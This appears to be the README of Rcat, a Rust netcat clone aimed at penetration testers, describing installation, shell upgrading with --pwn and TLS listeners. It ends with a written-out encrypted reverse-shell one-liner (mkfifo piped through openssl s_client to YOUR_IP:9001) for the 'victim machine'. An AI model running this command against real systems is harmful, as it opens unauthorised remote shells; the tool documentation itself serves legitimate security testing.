Rcat is a modern netcat written in Rust, packed with features for hackers.
Here we listen on port tcp:9001, and receive an HTTP request made with curl.
We provide binaries for:
- Linux amd64
- Linux arm64
- Windows (amd64)
- Mac OS (arm64)
git clone [email protected]:0xfalafel/rcat.git
cargo install --path .Rcat keeps a syntax similar to netcat. You already know how to use it.
-lto listen.-ufor udp.
Rcat can upgrade your shells with the --pwn option.
With an upgraded shell, you can use shortcuts like Ctrl + C, clear the terminal with clear or Ctrl + L, etc. It's like having an SSH connection.
There is no need to type 7 commands each time you obtain a reverse shell.
Here the commands
stty rows 22 cols 65andexport TERM=xterm-256colorsare typed automatically when the connection is received.
Unless you use the -R option, the remote terminal will automatically be resized when you change the size of your terminal.
(Rcat sends a SIGTSTP, resizes the terminal with the
sttycommand then usesfgto restore the application running.)
In this clip we run
htopon the victim machine, and the reverse shell is automatically resized.
Support of TLS with -t or --tls.
Here we do an HTTPS request. We use -t to establish a TLS connection, and -c to replace newlines (\n) with CRLF newlines (\r\n) as required by the HTTP protocol.
With TLS support, let's see how we can do an TLS encrypted reverse shell. Without installing any new tools on the victim.
If possible, you should probably use a signed certificate (with let's encrypt for example), but for now let's use a self-signed certificate.
Let's generate a self-signed certificate with openssl.
openssl genrsa -out private-key.pem 2048
openssl req -new -x509 -key private-key.pem -out my.cert -days 365Armed with this, let's create a listener that supports TLS.
rcat -l 9001 -t --cert my.cert --key private-key.pem --pwnThen execute the following command on the victim machine:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1| openssl s_client -connect YOUR_IP:9001 >/tmp/f